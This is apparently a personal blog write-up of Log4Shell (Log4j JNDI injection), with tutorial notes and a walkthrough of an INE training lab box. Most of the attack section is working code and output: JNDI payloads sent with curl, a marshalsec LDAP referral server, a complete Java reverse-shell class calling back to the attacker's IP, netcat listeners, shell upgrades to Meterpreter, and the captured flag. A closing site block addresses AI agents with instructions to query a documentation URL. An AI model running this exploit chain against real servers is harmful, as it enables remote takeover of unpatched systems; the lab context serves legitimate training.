# Log4j Vulnerability (Log4Shell) Background: 1-A quick 3 min video to get what all the fuss is about from Marcus Hutchins: {% embed url="" %} \ \ 2-reading: {% endembed %} * GOVCERT: {% embed url="" %} * More practical Demonstration from [Sophos](https://www.linkedin.com/company/sophos/): {% embed url="" %} \ \ -Interesting stuff on the wild with [#interactsh](https://www.linkedin.com/feed/hashtag/?keywords=interactsh) also from [Sophos](https://www.linkedin.com/company/sophos/): {% endembed %} {% embed url="" %} \ \ check-out the GitHub page this tool is a must in the arsenal:\ {% endembed %} ## Tut Notes: #### Check if the server is vul: 1- start a server/listener: ``` nc -nlvp 1234 ``` 2- send a request to the potential vul point: ``` curl "?cmd=$\{jndi:ldap://:1234\}" ``` if you received a conn (respond) in nc then it's vul. {% embed url="" %} to discover over WAN use CanaryTokens DNS {% endembed %} #### Exploiting the vul in your own LDAP server: * we will be using the following script to automate:\ 1- Setup the a LDAP server so we can interpret the response: ``` java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://:8080/#Exploit" ``` > \#Exploit: is the name of the exploit we will creat. * inside the poc.py there's the java code (in comment) copy it to a new `Exploit.java` file cuz this is the exploit. and fill in your `String host="";`* *`int port = ;`
2-compiling the exploit: ``` javac Exploit.java -source 8 -target 8 ``` > -source: Java version > > -target: JDK version > > 1 warning don't worry about it 3- Setup the server to host the Exploit: ``` python -m SimpleHTTPServer 8080 ``` > 8080 cuz that's the port we setup our ldap on. 4-Setup a listener to receive the conn from the target once it's exploited: ``` nc -nlvp 9999 ``` > same port as the one in the Exploit.java 5-attack (sending the req): ``` curl '?cmd=$\{jndi:ldap://:/Exploit\}' ``` > \: from step 1 > > no reason to provide the extension ldap knows it by itself. #### 🎉Now in nc you received a conn. and now you have a reverse shell.🎉 you can spawn a bash shell: ``` python -c 'import pty;pty.spawn("/bin/bash")' ``` and of course, you can upgrade to a meterpreter shell: ``` use multi/handler set LHOST set LPORT run background session -u 1 <-this uses shell2meterpreter module ``` ## Solving INE Box: {% embed url="" %} target: `demo.ine.local` My IP: `192.10.137.2` #### Footprinting: ``` ~# nmap -sV demo.ine.local Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-08 15:37 IST Nmap scan report for demo.ine.local (192.10.137.3) Host is up (0.0000090s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache Tomcat 8.5.3 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) ``` runs Apache Tomcat while by default it doesn't really depend on Log4j but it can be config: {% embed url="" %} Apache Jserv interesting but not tatrget here I know this ver is vul. #### Checking for the vul: ``` nc -nlvp 1234 ``` ``` curl 'http://demo.ine.local/login?cmd=$\{jndi:ldap:192.10.137.2:1234\}' ``` we got a respone in nc it's vul...😀 Time to exploit it: * my LDAP: ``` java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.10.137.2:8080/#Exploit" Listening on 0.0.0.0:1389 ``` * nc lisnter: ``` nc -nlvp 9999 ``` * Compiling the Java Exploit (RevShell): ``` import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host="192.10.137.2"; int port=9999; String cmd="/bin/sh"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port) InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e){} }; p.destroy(); s.close(); } } ``` ``` javac Exploit.java -source 8 -target 8 ``` * server Hosting the Exploit: ``` python -m SimpleHTTPServer 8080 ``` * exploit: ``` curl 'http://demo.ine.local/login?cmd=$\{jndi:ldap://192.10.137.2:1389/Exploit\}' ``` * Goal achived: ``` root@INE:~# nc -nlvp 9999 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999 Ncat: Connection from 192.10.137.3. Ncat: Connection from 192.10.137.3:46500. ls FLAG tomcat8 cat FLAG 33fbfa01ec2f791096f13e01988a164e ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mo-ela.gitbook.io/shifrablog/write-up/log4j-vulnerability-log4shell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.